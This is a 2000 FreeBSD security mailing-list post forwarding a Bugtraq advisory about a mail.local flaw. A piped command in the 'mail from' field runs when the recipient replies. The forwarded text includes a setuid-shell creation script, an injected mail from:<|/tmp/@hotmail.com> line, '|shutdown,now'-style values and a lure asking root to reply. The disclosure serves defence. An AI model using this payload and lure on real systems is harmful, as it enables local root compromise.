From owner-freebsd-security Thu Nov 2 5:42:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 5F8F137B479 for ; Thu, 2 Nov 2000 05:42:18 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id FAA02671 for ; Thu, 2 Nov 2000 05:42:17 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda02669; Thu Nov 2 05:42:16 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.0/8.9.1) id eA2DgFJ04815 for ; Thu, 2 Nov 2000 05:42:15 -0800 (PST) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdLB4811; Thu Nov 2 05:41:56 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.1/8.9.1) id eA2DfuZ34050 for ; Thu, 2 Nov 2000 05:41:56 -0800 (PST) Message-Id: <200011021341.eA2DfuZ34050@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdr34046; Thu Nov 2 05:41:49 2000 X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cy To: freebsd-security@freebsd.org Subject: vulnerability in mail.local (fwd) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 02 Nov 2000 05:41:49 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Looks like we could be vulnerable too. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC ------- Forwarded Message [headers removed] Message-ID: Date: Wed, 1 Nov 2000 18:57:10 GMT Reply-To: gregory duchemin Sender: Bugtraq List From: gregory duchemin Subject: vulnerability in mail.local To: BUGTRAQ@SECURITYFOCUS.COM hi, mail.local is a little setuid root prog designed, like its name suggest, for local mail delivering. Used with the -l option, we have an interactive mode in lmtp protocol ( simplified smtp for local mail delivery only ) A weakness exists in the 'mail from' field that allow any local user to insert a piped shell command that may be executed by the recipient when he does a reply with the mail command. A little social engineering skill should help to root the boxe. Finally, mail.local shouldn't allow such escape chars even in the mail from field and the command mail shouldn't allow such a reply through a pipe. A space char in the command will finish the string, so either u use a single command like '|reboot' or use a comma that should be converted in space by mail. eg: '|shutdown,now' Linux 2.4.0 beta Caldera that was freely distributed during the defcon 00 is vulnerable to this pb. That looks like the old sendmail bugs nostalgia ======= #cat exploit #!/bin/sh cp /bin/sh /tmp/newsh chmod a+rws /tmp/newsh #id #id=666(c3rb3r) gid=100(user) # #cp exploit /tmp/@hotmail.com #chmod a+x /tmp/@hotmail.com #mail.local -l .... mail from:<|/tmp/@hotmail.com> U can use many senders to hide the evil string rcpt to: data Subject:I have a problem I need higher priviledge on this machine, can u do something for me please ? thanx. c3rb3r ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message